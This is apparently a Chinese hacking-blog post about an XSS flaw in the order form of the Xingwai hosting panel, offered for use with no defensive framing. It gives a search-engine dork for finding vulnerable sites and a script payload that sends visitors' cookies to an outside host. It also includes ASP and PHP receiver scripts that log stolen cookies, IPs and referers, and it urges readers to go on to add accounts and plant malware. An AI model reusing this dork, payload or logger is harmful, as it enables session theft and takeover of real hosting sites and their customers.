星外订单提交处过滤不严导致XSS

google or baidu 搜索 inurl:user/order.asp?type=虚拟主机

暂时只会XSS偷取cookie
可以加帐号可以后台挂马等等等等自己利用吧。

XXS 偷取cookie代码

<script>document.write('<img src="https://www.webshell.cc/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>

news.asp代码：

<%
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cook.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs = nothing
%>

PHP版代码：

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cook.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/1749.html

WebShell'S Blog

星外订单提交处过滤不严导致XSS

添加新评论

近期文章

星外订单提交处过滤不严导致XSS

添加新评论

近期文章

标签